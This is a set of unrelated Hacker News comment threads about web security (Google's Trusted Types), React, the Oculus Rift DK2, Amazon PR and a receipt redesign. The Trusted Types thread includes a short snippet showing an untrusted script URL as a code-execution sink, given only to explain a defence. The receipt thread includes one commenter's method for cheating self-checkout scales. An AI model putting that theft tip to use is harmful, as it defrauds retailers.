eversnapapp.com was never meant to replace pro photography wedding photos, but
to add some authenticity to the mix (and capturing any friends and family get
together), plus we offer live slideshow moderation ;)
We also complete the offer with our own professional photography service on
eversnappro.com
That said, best of luck to you and your team!
~~~
louisswiss
nice - I hadn't looked at eversnappro.com before.
I wasn't trying to insinuate that eversnapapp.com was trying to replace pro
photos - I love the idea, the execution and would definitely use it myself ;)
------
pjlegato
What is your marketing plan to reach both the customers and the photographers
who will use the app?
~~~
louisswiss
Ah, the classic chicken & egg problem ;)
Finding awesome photographers has been much easier than we expected - by
posting 'photographer needed' adverts on forums/in camera shops/in facebook
groups it is easy to get a few hundred responses within a week. Over 50% then
sign up because there is no fee or obligation and hey, why wouldn't you?
We don't have the website live in an open beta yet, so we don't know how much
the b2c marketing will cost - we are actually focussed heavily on working with
partner websites to get them to embed our JS booking widget into their
websites. We are trialling with a job-platform and it is a great way for us to
reach customers at exactly the 'right moment' (ie when they have the need for
a photographer but perhaps hadn't fully considered it). The partner website
then gets a commission from each booking, so it is a great additional revenue
incentive for them as well.
So far, our customers have been really happy and word of mouth seems to work
really well for getting new bookings - this was really important for us as we
weren't sure that the customers would refer their friends to us at Lenzy and
not just to the photographer they worked with directly. By giving our
photographers a small commission on bookings we receive from their customers'
referrals, we seem to have avoided the HomeJoy problem (for now).
| {
"pile_set_name": "HackerNews"
} |
Trusted Types Help Prevent Cross-Site Scripting - spankalee
https://developers.google.com/web/updates/2019/02/trusted-types
======
comex
I’m a little skeptical. The example in the post, where you validate a URL
against a regex before string-interpolating it into an HTML fragment, is
essentially an anti-pattern. It’s too easy to screw up the regex and end up
with an injection vector, especially in cases (probably the majority of them)
where the thing being validated is less inherently constrained than
“alphanumeric”. Instead, it’s best to use APIs that are safe by construction -
in this case, using DOM APIs to create elements, without ever going through
the intermediate string representation of HTML. See also, “Never sanitize your
inputs!”:
[http://blog.hackensplat.com/2013/09/never-sanitize-your-
inpu...](http://blog.hackensplat.com/2013/09/never-sanitize-your-
inputs.html?m=1)
But if you use DOM APIs for everything, this “Trusted Types” API seems largely
unnecessary. It would be enough to expose a switch to disable innerHTML and
similar APIs entirely.
On the other hand, DOM APIs are rather unergonomic to use raw. Many wrappers
exist, but React‘s JSX takes the cake by letting you write code that _looks_
like string interpolation, yet compiles down to type-safe node creation. (Kind
of like what parameterized queries do for SQL.) If we’re looking at browser-
based approaches to solving XSS… how about standardizing something like JSX as
a built-in browser feature? That way it could be used by everyone, even those
who want to minimize dependencies or code directly for the browser.
(Yes, I know it’s been tried before, in the form of E4X. But that was a very
different era…)
~~~
rictic
Trusted Types are definitely designed with safe-by-construction APIs in mind.
A primary use case is to write a safe-by-construction library that internally
declares and uses a Trusted Types Policy that your CSP headers declare that
they trust.
If none of the policies in your CSP headers declare a createHTML method, then
you can be confident that innerHTML can't be used anywhere in your app.
You still want the other policy methods because there are other unsafe sinks
in the DOM. For example:
const scriptElem = document.createElement('script');
scriptElem.src = someUntrustedInput;
document.body.appendChild(scriptElem); // arbitrary code execution!
There's a number of these sinks, and they have legit important use cases, but
you want to be able to sustainably review all such uses. For example, you
could make a Trusted Types policy that will only accept a small number of
constants for script urls. That way you can still create script elements to
e.g. implement lazy loading of code, but you're certain that those APIs will
not be used by an attacker to load unknown code.
------
jrockway
I am surprised more programming language research hasn't focused on problems
like this. Perl had taint mode back in the day (presumably it still exists),
but it didn't quite do enough to really be helpful. I am glad to see this idea
resurfacing because I think it can solve a lot of problems, not just security-
related.
A long time ago, I remember people having an insane amount of trouble with
character handling; when you read binary data from a TCP socket or UNIX file,
you're reading bytes, not characters. But many people would treat the bytes
like characters, causing all sorts of trouble. My favorite was the double-
encoding, where you read UTF-8 encoded characters as bytes, treat the bytes as
Latin-1, then encode the Latin-1 characters as UTF-8. This was a perl quirk
because Latin-1 was the default, but the same bug happens in other languages.
Anyway, a good tainting system could prevent this sort of bug. The language
can say "hey, this is a TCP socket, you can't treat those bytes as
characters!" But it doesn't. And the bug occurs again and again.
(The corner cases that people don't think about are the real problems. What
charset are those bytes in your URL? What about filenames? The answer is: it's
often undefined. So rather than hope for the best, a compiler error would be
ideal.)
The state of the art, as far as I can tell, is to just treat everything as
UTF-8 these days. Since everyone seems to love UTF-8, it just works. Maybe
that was the real solution. But I know there are a lot of Japanese-speakers
with names that can't be encoded as UTF-8. I wonder what they're doing about
that.
~~~
Sohcahtoa82
I feel like Python 3 has largely resolved the bytes vs characters problem.
Byte arrays and strings are different classes in Py3. File and socket I/O
deals only in byte arrays which are treated more like lists than strings. To
perform a lot of string-like operations, you have to explicitly decode the
byte array into a string. If you get it wrong, you'll likely get either a
TypeError.
~~~
jrockway
This is good, but I'd prefer the error to occur at compile time. Consider the
case where you do something like creating an error message because you can't
open a file, and want to include the filename. The filename is bytes, the
error message is a string, so instead of being able to print the error
message, you instead throw an undebuggable exception.
Dunno if that in particular is a problem in Python or not... but it is the
sort of thing to watch out for.
~~~
Sohcahtoa82
In Python, filenames can be either bytes or string.
Also, I made a mistake in my previous post. File I/O can deal with bytes OR
strings depending on the parameters sent to the `open()` function.
file_handle = open('somefile.txt')
This opens the file in text mode (so `file_handle.read()` returns strings)
using a platform-dependent encoding. On Windows, this will probably be
CP-1252. On Linux, UTF-8. Of course, you can always explicitly choose the
encoding:
file_handle = open('somefile.txt', encoding='utf8')
If you know you want to only deal with bytes, you can explicitly set that:
file_handle = open('somefile.ext', mode='rb')
I agree that it'd be nice to be able to see bytes vs strings errors at compile
time, but this is difficult or even impossible with a duck-typed interpreted
language like Python. IDEs and linters can make a good attempt at it, but
they're not perfect.
------
rubbingalcohol
How about just don't use innerHTML? It's slow, insecure and lazy. We don't
need Google pushing more proprietary fake web standards in their IE6 browser.
They should fix the existing issues in CSP (like WebAssembly being completely
broken) before adding new crap to it.
~~~
arkadiyt
There's a lot more XSS sinks than innerHTML, and "just don't do it" isn't
helpful security engineering. Mike Samuel published a great post with lots of
context on the design of Trusted Types at Google and why they think it works
well:
[https://github.com/w3c/webappsec-trusted-
types/wiki/design-h...](https://github.com/w3c/webappsec-trusted-
types/wiki/design-history)
~~~
rubbingalcohol
It's a lot of handwaving. So Google improperly saved HTML into database string
fields and now needs to figure out how to safely render it in a template. We
don't need a new web "standard" to help them wallpaper over their first-party
bugs.
For the longest time Firefox add-on developers were prohibited from submitting
extensions with eval or innerHTML precisely because it is ~not safe~! Adding a
bunch of browser-enforced regex checks to your strings is the wrong solution
here. The solution is to not write code that writes itself.
~~~
jamesgeck0
> So Google improperly saved HTML into database string fields and now needs to
> figure out how to safely render it in a template.
FWIW, "store anything, sanitize at render time" is the preferred approach for
some popular web frameworks, including Rails.
~~~
rubbingalcohol
And that's fine. To the extent that stored data represents a security risk,
sanitization can and should be done on the server side.
------
zer0faith
Am I reading this correctly.. creating a regexp introduced into a template,
then applying that template to a value in the web request?
~~~
stevekemp
Pretty much. Interestingly it is a very similar approach to Perl's "taint
mode". The intention is obviously that you can't blindly use/output values
that are user-provided. Instead you must validate, and convert them to a
"trusted type", at which point you can use them in your DOM tree, or wherever
you wish.
The big difference is that if you forget a place here you'll get a type error
- rather than the current situation where if you forget to validate/sanitize
you get an XSS attack.
| {
"pile_set_name": "HackerNews"
} |
Living Code. Show off your code in a fancy way. - rodnylobos
Need to build a reduced demonstration of your latest creation?

Living Code is great for that: it's a clean and fancy way to show off your code in an old-fashioned ASCII terminal emulator. Living Code is part of the JS1k demo, which means it has less than 1024 bytes.

http://js1k.com/2013-spring/demo/1387#.UVLAsFETayc.twitter

Submission [1387] JS1k.
======
jameswyse
Clickable: <http://js1k.com/2013-spring/demo/1387#.UVLAsFETayc.twitter>
Love the blur effect following the cursor, well done :)
------
jdolitsky
very cool
| {
"pile_set_name": "HackerNews"
} |
Judge throws out teen’s murder conviction 70 years after his execution - yuashizuki
http://www.washingtonpost.com/news/post-nation/wp/2014/12/17/judge-throws-out-teens-murder-conviction-70-years-after-his-execution/
======
PhantomGremlin
Fortunately we've made some progress in terms of rights of the accused in the
last 70 years. It's stories like these that provide strong arguments against
the death penalty.
But the pendulum does swing the other way, to weekend furloughs for murderers
sentenced to life imprisonment without parole.[1] That particular individual
played a big role in the 1988 US Presidential election.
[1]
[https://en.wikipedia.org/wiki/Willie_Horton](https://en.wikipedia.org/wiki/Willie_Horton)
------
shalbert
Wow.
| {
"pile_set_name": "HackerNews"
} |
Multimedia C++ library SFML 2.0 has been released - eXpl0it3r
http://www.sfml-dev.org/
======
axusgrad
It's an easy library to get into. I was able to play around with basic OpenGL,
and the program was cross-platform without needing any #ifdef statements.
What's amazing to me is how Laurent basically writes it and runs the website
by himself (as far as I can tell).
| {
"pile_set_name": "HackerNews"
} |
In this video you will see 70 lighters vs. fire - macheens
https://www.youtube.com/watch?v=pwn0954J3kM
======
m6w6
What a waste of time and resources.
| {
"pile_set_name": "HackerNews"
} |
How Rotten Tomatoes Changed the Film Industry - DmenshunlAnlsis
https://daily.jstor.org/how-rotten-tomatoes-changed-the-film-industry/
======
lucb1e
That's a very... nothing-saying article. It mentions that some professional
(money-making) movie reviewers gathered a decade ago for an interview, and
admitted that it might be nice to get an opinion of a large audience through
the internet, rather than only a few reviewers'. And from that it half-
concludes that there is some tension between the two (online, 'democratic'
platforms and the professional reviewers), and cites someone who hopes they
can coexist or something. Umm, okay?
So how did the actual film industry change? All I read is about reviewers
potentially having gone out of business because reviews can be found in bulk
online.
| {
"pile_set_name": "HackerNews"
} |
Day One with the Oculus Rift DK2 - bane
http://www.roadtovr.com/day-one-oculus-rift-dk2-good-ugly-games/
======
jimrandomh
Does anyone have data on how big fonts have to be, to be legible on a DK2? Ie,
if you embed a terminal in a virtual world, and give it about 30 degrees of
horizontal space, how many characters will that fit?
~~~
cma
It's a 90 degree FOV. Each eye gets half of 1920; divided by 3 (30°/90°),
you'll get 1920/(3*2) = at least 320 horizontal pixels to work with. There are
more pixels in the center due to how the distortion works, so in practice a
little more than 320.
(edit: actually, if I recall, the 90° FOV on DK2 is actually a diagonal FOV,
so you are looking at a ~78° horizontal FOV)
------
thenmar
Sounds pretty encouraging. I hope Facebook's financial backing can turn this
into a mass market product in a few years. Also interesting that the
development kits cost only $350. I wonder if that could drop lower with a
bigger production, or if the economy of scale benefits have already been
reaped via 3rd party hardware producers.
~~~
objclxt
Well, it's entirely possible - probable, even - that Oculus are selling the
DK2 at a loss right now (which isn't unheard of at all for development
hardware.
~~~
ghostfish
I doubt they're taking a loss, and I'd be surprised if they're not making a
decent profit. What are the components? A 1080p cell phone screen, some
cabling, custom plastic enclosure and straps, an IR webcam, and the
PCB+components. That's not much, cost wise.
~~~
sonnym
I think this very much oversimplifies the costs. From a hardware standpoint
this is probably mostly correct, but the problem is the sheer amount of
research and talent behind it is not remotely inexpensive. I recall Carmack
saying, about a year after he joined Oculus, that he thought getting the
latency down would be straightforward (sorry - I can't find a source), but it
turned out to be a much harder problem than he expected. And, when Carmack is
stuck, I cannot but believe there are intricacies that I could not hope to
understand at play. The fact that they have been unable to ship a consumer
version after all this time, I think, corroborates that this is a much more
difficult problem than just throwing some hardware together and calling it a
day.
------
Alphasite_
If nothing else, the new elite also supports the dk2, although we may not see
the full experience until Monday.
------
acron0
This article has made me $350 lighter.
------
_random_
Does 'DK2' mean "ready to be released before Xmas" in their language?
~~~
erikpukinskis
I think they said if there is DK3 it will basically be production hardware
released to a limited number of developers shortly before consumer release.
They have been careful not to say anything about release dates for the
consumer device but my understanding is that 2014 is possible but unlikely.
------
notastartup
there was also this game I forgot the name but the space ships were so
detailed it was amazing when it was demoed on oculus rift.
this new version seems a huge step up from previous version, namely the
resolution increase.
I so badly want this now as the low resolution is what has turned me off DK1.
On a side note, I wonder how difficult it will be to see a glove that you can
wear and get tactile feedback?
~~~
scrollaway
I think it might have been EVE Valkyrie. Although Star Citizen has got to look
pretty amazing in the DK2 - Has anyone tried it? I only have the DK1 to play
with, unfortunately.
| {
"pile_set_name": "HackerNews"
} |
The React Is “just” JavaScript Myth - formikaio
https://daverupert.com/2018/06/the-react-is-just-javascript-myth/
======
ipsum2
> React is so much more than “just JavaScript”. React is an ecosystem. I feel
> like it’s a disservice to anyone trying to learn to diminish all that React
> entails. React shows up on the scene with Babel, Webpack, and JSX (which
> each have their own learning curve) then quickly branches out into
> technologies like Redux, React-Router, Immutable.js, Axios, Jest, Next.js,
> Create-React-App, GraphQL, and whatever weird plugin you need for your app.
> In my experience, there’s no casual mode within React. You need to be all-
> in, keeping up with the ecosystem, or else your knowledge evaporates.
This is not true at all. I use React for work and for pet projects, and I
don't use or know what most of these libraries do. (We do use Redux).
It's easy to get caught up in library mania and chase after the newest
javascript fads, but it is not necessary to build products.
Also, GraphQL is not tied to React or Javascript.
~~~
sus_007
Just out of curiosity, what are your thoughts on Vue? I've heard a lot of good
things about it.
~~~
ipsum2
I dislike the templating language, preferring jsx which is mostly standard js
syntax, e.g.:
Vue: <li v-for="i in items">{{i}}</li>
React: items.map((i) => <li>{i}</li>)
~~~
bartaxyz
Just to make things clear. You can use JSX with Vue as well. It's even a
recognized way to write code in the official documentation
([https://vuejs.org/v2/guide/render-
function.html#JSX](https://vuejs.org/v2/guide/render-function.html#JSX)). JSX
is just a language that can be interpreted into code for React & Vue.
~~~
Can_Not
Not to mention that you can use Jade/pug, also.
------
Androider
It's absolutely fine to adopt React piece by piece, I disagree entirely that
it's an all-or-nothing proposition. I've converted a heavily used in-
production service from 0% to 100% React over the course of more than a year.
And this is an SPA, so over that year there was literally jQuery and React
rendering to the same DOM. It works just fine, it's all just JS.
You don't have to use Redux etc. (but you probably do if you have sufficiently
complex state). Even then, you can do things like have multiple stores in the
same app. It's fine! It's just JS objects being spliced, merged, propagated.
You eventually converge on a single store as the various React parts merge.
You don't need to use react-router, or even a router lib. It's probably better
if you don't, given how many times that shitshow of an API has been completely
rewritten. I took one look at it, could tell that this lib wanted to be fully
in charge, and noped out. It's fine to manage browser URL state yourself, it's
just JS and the browser APIs are OK for that nowadays.
Now we're in the process of adopting Immutable.js. It's fine, it's just
fancier collections, with some conveniences and being able to use
React.PureComponent 99% of the time without worry. So your codebase is 50%
fancy collections and 50% JS natives? That's fine, don't worry about it, just
write new components using Immutable.js if that's the direction you're going.
Don't worry about the top-level Redux container not being an Immutable
instance, just use it for the leaves then.
Server side rendering? I retrofitted that in a weekend by compiling the app as
a lib with Webpack (the project started as Gulp way back) and including it in
Node.js as an import. Worked just fine, nothing to it. Now we're generating
PDFs using the same frontend code with Puppeteer and SSR, it's awesome.
The app is in a better shape than ever, a real pleasure to work with. Jest
tests for React stuff, Mocha tests for other parts. And that's fine, no need
to get all religious about which one is the "one true" framework.
------
hazza1
The jQuery api was hundreds of different methods, the best of which are now
available natively in JavaScript.
React has a very small api, I hardly ever refer to the documentation (unlike
when I was a jQuery or Angular developer)
I agree that people reach too early for helper libraries but you can go a long
way in pure React.
~~~
mrtksn
Because React doesn't manipulate the DOM directly you're leaving every
convention and tool about DOM manipulation behind, which means that the moment
you want to do something more complex than composing components you either
have to re-invent the wheel or use the brand new wheels that somebody re-
invented.
React is brilliant but makes simple stuff that no one was thinking about
anymore hard and complex again. So if you don't want to think about how to handle an
AJAX request and an animation like it's 2004 you can just slap a library on
top of React(and worry about the page size and loading strategies).
React is a statement, a revolution, it is about disowning the old Web and
building it from scratch.
~~~
hazza1
fetch and CSS handle AJAX and animation absolutely fine with native calls and
work well with React, why would you bring in a library to handle these?
~~~
mrtksn
You bring animation libraries in when your UI animations don't necessarily
match the component lifecycles and you don't want to do something basic. Well,
you don't have to bring in animation libraries but then you'll have to
engineer it by yourself and handle all the quirks.
In React you simulate a DOM(or whatever) instead of working on a DOM that's
handled by the browser(or whatever).
It's just like the difference of a real-world physics and simulated physics.
In the real world, you can throw a rock and the nature will handle everything.
On a simulation, you will have to think about all kind of details to make your
simulation as realistic as possible.
~~~
hazza1
I don't really see how complex animations is something React (or any UI
framework) should be responsible for ?
~~~
mrtksn
Who should be responsible if not the UI framework?
Oh, and by complex, I don't mean character animation or something. It's the
stuff that is supposed to act differently than the React's internal workings.
For example, if you want to do an animation on items that disappear when the
user takes an action, it's not going to be as easy as with plain JS manipulating
the DOM. Also, you won't be able to use some nice artistic animations that
were created by direct DOM manipulation.
------
ralmidani
Having an ecosystem does not, in my humble opinion, make writing a React
application feel substantively different from writing a pure JS application.
Yes, JSX is not part of the core language (yet), but it's the closest to pure
JS we are going to get considering developers' need for an intuitive,
expressive, and virtually bulletproof templating language.
Before learning React, I built some decent-sized applications with Ember and
Emblem (a whitespace-significant language that compiles to Handlebars) and it
was utterly painful. Not wanting to deal with Handlebars' proprietary, Ruby-
like syntax (not bad per se--Ruby is really cool--but out-of-place in a JS
application) and its artificial limitations on what you can do with the
language (anything resembling display logic has to be extracted into special
helper functions) is probably the single biggest reason I ultimately came to
prefer React over Ember, despite Ember having some conveniences React didn't
and still doesn't (such as a concrete modeling and persistence layer like
Ember Data).
With that aside, I think React is the closest we can get to "just JS" without
abandoning pragmatism.
Transpilers and build systems are a necessity when the language itself is
changing at such a rapid pace and there are so many different environmental
concerns an application needs to satisfy.
~~~
acdha
Out of curiosity, what do you think about lit-html[1]? The main thing I’m
interested in there is that it’s based on native web technologies so you don’t
need the huge non-standard React stack just to be able to load a file. Having
had similar experiences with frameworks in the past, I'm increasingly inclined
only to use things which are moving in the direction of web standards to
reduce the amount of churn.
1\. [https://github.com/Polymer/lit-
html/blob/master/README.md](https://github.com/Polymer/lit-
html/blob/master/README.md)
~~~
ralmidani
Looks nice! I've thought about working with tagged template literals before,
but I didn't know Google already had such a project.
On the flip side, I am apprehensive about it being run by Google. Look at what
happened with Angular 1.x, which was also supposed to let you do data-binding
without abandoning valid html completely.
Also, JSX offers some conveniences I'm not sure would be possible with tagged
templates, such as not having to join an array explicitly after you map its
data to markup. Edit: I stand corrected; lit-html supports mapping an array to
markup naturally.
As far as churn, which in general is a valid concern, I don't think React is
going anywhere in the foreseeable future; it, along with Vue, has gained
developer mindshare even jQuery may not have enjoyed back in its glory days.
Absent a totally unexpected breakthrough, or Facebook really dropping the ball
on updates, I think React could easily be viable in 2025 or beyond.
Edit: lit-html is built with TypeScript, oh my! I will definitely be diving
deeper into this project. Especially if I'm not building an SPA.
------
ThePhysicist
Personally I strongly disagree that you need to be "all in" on the React
ecosystem if you don't want your knowledge to evaporate (as the author puts
it):
I've been using React since 2015 when it was still in beta, so I witnessed the
evolution and invention of the whole ecosystem around it firsthand.
And while it's true that the team and community introduced many new tools and
technologies, you could probably still use the original React documentation
from 2015 to build a simple app (as to my knowledge no backwards-incompatible
syntax changes were introduced).
Also, for 99 % of apps you probably don't need the full-blown React stack like
React Router, Redux, server-side rendering, hot reloading, transpiling with
Babel, bundling with Webpack2 etc. I routinely build small React apps for
websites (e.g. for contact forms) using just vanilla React.js (actually
Preact.js as it has a smaller footprint) without any of the amenities listed
above, and sometimes I even write old-style ES5 code and use JS-based tags
instead of JSX.
So please only introduce additional complexity (in form of tools, libraries
and add-ons) if you really really need it. The more complex your toolchain,
the more effort you will spend just maintaining and upgrading it instead of
doing productive work (frontend devs who tried upgrading Webpack and Babel.js
to the latest version in an existing project with many dependencies probably
know what I'm talking about).
------
ljm
React has certainly inspired a huge shift in how we architect frontend web
apps, and I think I'd rather view it on those terms instead of just how much
you might buy into React's worldview and all of the libraries that subscribe
to it when building your app.
React is one particularly well-regarded implementation of a virtual DOM
library with one way databinding and ever since then we've seen various
flavours of it with innovations of their own: Elm and the architecture that
inspired Redux, ReasonML, reflex-frp, CLJS/Om, Vue, Cycle.js, Glimmer, etc...
React, as far as I know, was the first for the web and while it might have
been well-known in other situations, we were all scrambling around trying to
solve the data-binding problem when building anything large scale in JS.
In that way, React's impact on the frontend ecosystem is profound much in the
way jQuery's impact was back in the darker days, and what that technology has
allowed us to do _without depending on React itself_ is significant, much more
so than its own ecosystem.
------
goofballlogic
Strange article. The add-on libraries described aren't necessary at all.
------
petilon
The benefits of React (such as its templating syntax) can be had with much
simpler libraries, such as this one:
[https://github.com/wisercoder/uibuilder](https://github.com/wisercoder/uibuilder)
The much touted benefit of React, DOM diffing, is useful if you have a very
complex screen and you need to make surgical updates. Most applications have
simple screens that can be completely re-rendered and the user won't know the
difference.
------
davnicwil
> I sometimes browse React projects and look at the import blocks to see if I
> recognize any of the dependencies; I probably average about ~8%.
This is very true, not just because of the libraries you don't know yet but
also because those you do know are continuously evolving. I've been working in
the React ecosystem for about 4 years now. I think constantly keeping an eye
on the changing ecosystem, and constantly changing the way you do things where
it makes sense, just comes with the territory now. You just have to accept it
as a way of working, if you're going to enjoy working with React (and JS
generally).
Whenever I've locked down dependencies and just got my head down and built
stuff for a few months, without fail every time I've looked up I've realised
that there are now multiple things in my stack that are 'outdated' and there
are some _genuinely_ better ways of doing things (some really are just
different and equally good, and it's fine to ignore those) that have evolved
and been evaluated and ultimately embraced by the community in parallel in the
few short months I've had my head down.
To be honest it's what I love about the JS ecosystem in general - it's an
environment of continual improvement and blisteringly fast pace of change.
~~~
wolco
I too love the constant change; it's exciting.
But you can't live like that forever. Things need to remain constant so you
can work on difficult business logic instead of changing how you do standard
things.
~~~
davnicwil
The point I was making though is that this isn't necessarily true - you can do
both simultaneously. Your stack _can_ be continually improving while you still
focus on feature delivery in parallel. What I was getting at is that you
should embrace and enjoy this if you want to be happy working in the frontend,
specifically React, world.
------
EugeneOZ
As an "Angular-guy" I can ensure you that with Angular we use also builders,
minifiers and even TypeScript compiler. And testing is a separate story with
painful moments. Of course, we have much more tools out of the box - we don't
have to look for a good router, for example.
But there is no paradise of one magic tool in the web development.
------
hliyan
As a long time React user (four years), I agree with this article for reasons
different from what the author intended, perhaps. That's why I've recently
started learning Dart and hoping that it'll catch on. I want to focus on
solving the problem, not battling the ecosystem...
------
Marazan
This confuses React with the react eco system.
I am a happy productive React user and I don't know two figs about the wider
eco system.
Whatever man, React is just JavaScript and they've learnt what not to do from
Adobe Flex, that is why I am so fast and productive in it
------
ENGNR
If anything I'd love to see a barebones 'obj => native DOM' library built into
browsers
Let React and others compete over the more advanced use cases like context,
lifecycle methods etc
Amazon.com: How the Online Giant Hoodwinks the Press - ojbyrne
http://www.slate.com/id/2207537/
======
tl
I don't see any hoodwinking going on here. I do see a vapid piece about the
same press that generally fails at fact-checking and at not being a PR
mouthpiece, doing what they normally do.
~~~
thinkzig
Agreed. It's a sad commentary on what passes for journalism these days.
Sounds provocative? Run with it.
Facts? Who needs 'em. We've got ads to sell.
Sad.
------
TomOfTTB
I’m going to defend this article. I do think the headline has too much
hyperbole but the point he makes is a good one: Amazon’s PR department made a
claim and papers just ran with that claim sight unseen.
What makes this a bigger issue than simple fact checking is that the claim is
coming from Amazon’s PR department which has every reason to exaggerate and
the claim is unverifiable by the media. So while a normal fact checking error
involves the press not checking out what they believe to be true this
situation involves the press publishing something that is very likely false
and which we know they couldn’t check.
So while it seems like an attack on Amazon (which would be out of line since
their PR is just doing what they’re supposed to) it’s really an attack on
sloppy journalism.
------
mattmcknight
This article is ridiculous. No one is hoodwinking anyone. Amazon is choosing
what to report on very carefully here. They don't want to actually pre-
announce Q4 financials. In any case, from a technical and operations
perspective it is very interesting to know what capacity they are capable of.
(Especially given the number of e-commerce sites that had significant downtime
this year.)
------
sireat
In related news, suit is back this year...
Amazon's PR here is not particularly insidious, what you see/read in Mass
Media is PR roughly 80 percent of the time (some MM such as The Economist
excepted).
------
AndrewWarner
This is why I think we need to be careful when we're studying success. Much of
what people claim is PR.
------
sabat
Amazon PR learned a lot from the Bush administration (K.R.) about how to fool
them. State things as though they're established facts. Typical lazy editors
won't insist that the facts are checked.
~~~
jerf
That's not "learned from the Bush administration", that's PR 101. Go read pg's
essay on PR, which is only news because it's being explained to people not in
the PR industry, not because it was actually new information:
<http://www.paulgraham.com/submarine.html>
The press hasn't been in the business of checking facts for at least two
decades, and it just gets worse and worse.
~~~
sabat
Please, don't try to tell me that KR didn't take it to new heights (and new
levels of cynicism).
The humble receipt gets a redesign - colinprince
https://www.fastcompany.com/90347782/the-humble-receipt-gets-a-brilliant-redesign
======
rchaud
Struggling to understand the use case for this. I stare at my grocery receipts
like everyone else, but it's to verify the prices I bought them at; sometimes
I pick up an item that I think is marked on sale, when it's actually the
adjacent item that's been discounted. As a whole, the bubble chart doesn't
tell me anything. Meat costs more than an equivalent amount of fruit. Unless
you're looking to go vegetarian for financial reasons, you're not going to
learn much from that chart.
Splitting up items into a taxonomy is somewhat useful, but not when it only
exists on a printed receipt that will go into the trash. It's also not that
useful if you make multiple trips a week, as single people often do.
Finally, it's not useful at all if the categories are based on the company's
SKU/ERP nomenclature, as opposed to a human-centric approach. If one brand of
Ice Cream appears under "Eggs & Dairy" but another under
"Confectionery/Bakery" what value do you get by having that itemized on a
receipt?
~~~
schmookeeg
I like it more than the old fashioned receipt it seeks to replace. I would
look at it and it would bring me a small, fleeting bit of joy.
I prefer no receipts at all, but that doesn't seem to be a universal option.
So if I'm going to get the paper receipt anyway, may as well have some
pleasing design applied to it, and a thought-provoking categorization for me
to reflect upon before I crumple and toss the thing. Beats the pants off of
the old version.
If I was reading a business plan and being asked to invest, yeah, I'd respond
to it your way too. As a "thing that could exist", though, I appreciate it.
~~~
rchaud
I just don't think groceries are the right market for this. For "joy", the
differentiator has to be in-person customer service, because grocery margins
are razor-thin, and the last thing any exec wants to propose is to modify the
ERP (there be dragons) so it generates the clean data that's required for
visualizations.
At my store, they are pushing to reduce checkout staff by "encouraging"
customers to use self-checkout. It hasn't been going well, but this is a
retail-wide trend, and cost-cutting pressures are immense.
Again, because this is so data-centric, the visualizations will generate
errors and miscategorizations that will confuse customers more than if they
had ye olde dot matrix printed receipt.
~~~
JetSpiegel
> At my store, they are pushing to reduce checkout staff by "encouraging"
> customers to use self-checkout. It hasn't been going well, but this is a
> retail-wide trend, and cost-cutting pressures are immense.
This infuriates me so much, I started to see if I could game the system. Fruit
is the easy part, you fill your bag with the expensive fruit, and select
apples or something cheap on the checkout scale. Works better on larger
stores, the minimum wage person overseeing 6 self-checkout machines can't
watch everything, maybe half the people need help, or the scale borks for some
reason.
My local supermarket replaced pre-packaged bread bags, weighed by the
employees, with a completely à la carte system, which is a complete shitshow.
You pick the bread in one place, do your entire shopping and then have to
remember which SKU you have chosen. It's a complete waste of time for everyone,
and I'm pretty sure the surrounding traditional bakeries won here; the bread
selection has shrunk substantially at the supermarket.
~~~
luckman212
So you're "infuriated" that retail stores have to cut staff in order to
survive, yet in the next breath you boast about how simple it is to steal from
the store? I see you also didn't forget to belittle the hapless "minimum wage
person" who you're purporting to care about.
~~~
JetSpiegel
> yet in the next breath you boast about how simple it is to steal from the
> store?
> I see you also didn't forget to belittle the hapless "minimum wage person"
> who you're purporting to care about.
That's my point. The employees are valuable, even in a pure profit-driven
analysis.
> retail stores have to cut staff in order to survive
This is completely false, "surviving" is not the word to describe retailers.
------
neogodless
Here's my opinion:
What she got right
- see items within categories from most expensive category to least, each
category showing a percent of your total grocery bill
- see relative price within a category at a glance (even if you buy wine,
that's within your alcohol category, so it won't mess up the relative pricing
of your dairy or snacks)
What might not go so well
- the bubble chart is less universal and intuitive (and it's "quirky")
- does volume (of what's printed) matter for thermal printing costs?
- would waiting to print the receipt at the end cause a big slowdown vs
printing as you ring items up? (I believe with most current systems, items can
be added and removed, and they show up as 'add' and 'remove' line items,
because it does print as you scan.)
Many people mentioned digital/CSV breakdowns. I know Home Depot quietly
connected my credit card to my email address after asking me if I wanted a
digital receipt, and I typed in an email. So this seems like a reasonable
option, for anyone that grants permission. (Home Depot annoys me because I say
"Yeah! E-mail me!" and then they hand me a receipt anyway. Ungh!)
~~~
octocode
The print volume matters. These new receipts would be at least 3x longer than
they need to be, and thermal paper:
a) costs money
b) is considered to be highly toxic
c) often isn't accepted by local recycling programs (but people still throw
receipts in anyway)
d) ultimately end up in the garbage, or even just littering street corners.
~~~
erdo
> 3x longer
I used to work for a large payment processing company that supplied POS
systems to retailers, I was surprised to find that receipt length does matter
a lot to some retailers.
The department that shipped till rolls liked long receipts, it made enough of
a financial difference to them to matter.
The retailers hated long receipts, because obviously that meant they needed to
buy more till rolls.
(It's worth remembering that the customers for most POS solutions are
retailers, not the person who buys something in a shop)
~~~
adventured
> The retailers hated long receipts, because obviously that meant they needed
> to buy more till rolls.
Changing out the printer roll is very annoying as well, for a retailer's
cashiers. It's slightly time consuming and it doesn't always go smoothly. It
inevitably results in a customer having to wait longer, slowing the checkout
process further. The less often that action is needed to be performed, the
better.
------
gumby
What's the incentive for a shop to provide this info? From their PoV they
provide it in the itemizations. You can do with that what you will.
It's in the shop's interest to use an antipattern that _obscures_ detail so
you don't reflect on where your money is going, and possibly choose to spend
less.
~~~
iddan
The company's interest is also to give customers value
~~~
firethief
Value as judged by the customers, not rational actors. Useful as this is,
drawing more focus to costs would drive customers to shop elsewhere. A version
of this I could see shops actually implementing would be a graph of the
"savings" per-item, a metric which is essentially meaningless but gives people
savvy feelings.
~~~
IggleSniggle
I disagree. I would prefer to shop at a place that showed me this. It would
increase my loyalty to that grocer. The downside to the grocer is that I might
be less inclined to buy meat, but maybe that still works because I instead
gravitate to expensive veg options and look at my percent spend and celebrate
my good decision making.
The only way this would drive me to use a different grocery is if it did a
price comparison vs other grocers and I discovered I was getting screwed...but
even then, if it was marginal, I’m not sure I would change grocer.
Edit: currently, as a shopper, you are most likely to just look at the bottom
line. I think you are right that grocer adoption would be complicated from a
business decision perspective, but I think implementation of this would hit
“brand names” more than anyone else. It's in both the grocers' and shoppers'
best interest.
~~~
firethief
I never said _no one_ would like it, so your counterexample isn't a basis to
disagree unless you think most people are as rational as you [think you are]
in the checkout line (they aren't).
Besides, our own assessments of our preferences are notoriously inaccurate. It
